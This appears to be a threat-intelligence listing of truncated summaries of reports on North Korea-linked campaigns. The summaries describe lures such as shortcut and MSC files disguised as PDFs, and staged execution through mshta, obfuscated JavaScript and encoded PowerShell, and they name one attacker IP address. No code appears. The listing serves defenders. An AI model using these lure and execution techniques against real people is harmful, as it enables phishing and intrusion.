778 reports
Konni is linked to a malicious Windows shortcut disguised as a KISA notification PDF that appears designed to exploit public concern around a recent SK Telecom breach. The shortcut abuses mshta.exe to run obfuscated JavaScript that launches PowerShell, wr…
The Medium analysis reviews two Base64-encoded PowerShell payloads attributed to Kimsuky-related activity and XWorm RAT. After decoding, the scripts show staged behavior: PowerShell and CMD execution, fileless or obfuscated script execution, download of a…
Flashpoint investigated the DPRK remote IT worker fraud scheme by pivoting from domains named in a December 2024 US indictment into compromised credential and infostealer-log data. Analysts linked fake company domains, reused registrant email accounts, Pa…
Genians identified Operation ToyBox Story as a March 2025 APT37 spear-phishing campaign against activists and experts working on North Korea issues. The lures impersonated a North Korea-focused expert and a South Korean national security think tank event,…
Genians analyzed Operation ToyBox Story, a March 2025 APT37 spear-phishing campaign that targeted activists and experts focused on North Korea. The attackers impersonated a South Korean national security think tank event and a North Korea-focused expert, …
Kimsuky activity used an NDA.pdf.msc lure that looked like a PDF through a Microsoft Edge icon but executed as a Windows MSC file. Triple Base64-decoded content launched PowerShell to download password-protected RAR payloads and UnRAR from 109.107.157.107…
KISA warned that attackers were impersonating the Korea Internet & Security Agency with an attachment named KISA알림.pdf.lnk. The advisory says the lure likely referenced KISA security services or recent SK Telecom breach news, although the original phishin…
Wazuh describes InvisibleFerret as a Python-based backdoor used in North Korea-linked campaigns, especially Lazarus recruitment-themed operations against technology, finance, and cryptocurrency professionals. The malware is delivered as a second-stage pay…
The report analyzes PebbleDash, a backdoor historically associated with Lazarus and more recently observed in activity linked to Kimsuky. The malware appears to depend on a preceding loader or installation stage to place configuration data and persistence…
There has been an increase in targeting of European and Japanese organizations in this campaign, likely as a result of increased awareness among U.S.-based organizations and actions taken to combat the threat. The origins of this campaign, publicly tracke…
WaterPlum, also known as Famous Chollima or PurpleBravo, is described as a North Korea-linked actor targeting financial institutions, cryptocurrency businesses, and FinTech companies worldwide. The Japanese-language analysis says OtterCookie evolved from …
NTT analyzed updated OtterCookie malware used by WaterPlum, also tracked as Famous Chollima or PurpleBravo, against financial, cryptocurrency, and FinTech targets. The malware evolved from a file grabber into v3 and v4 variants with Windows support, hardc…
Kimsuky activity used a phishing email impersonating South Korea's National Tax Service with an April filing and payment deadline notice as the lure. The message came through Mail.ru infrastructure and sent recipients to a spoofed Naver login flow on e-in…
A report from Yonhap states that a digital signing certificate associated with CJ OliveNetworks was found in malware described by security sources as North Korea-linked. The certificate had reportedly been abused to make malicious files appear legitimate,…
Supply chain targeting has become a hallmark of the DPRK’s cyber strategy, underpinning the regime’s theft of more than $6 billion in cryptocurrency since 2017. Initial access involved social engineering, likely approaching the developer via platforms lik…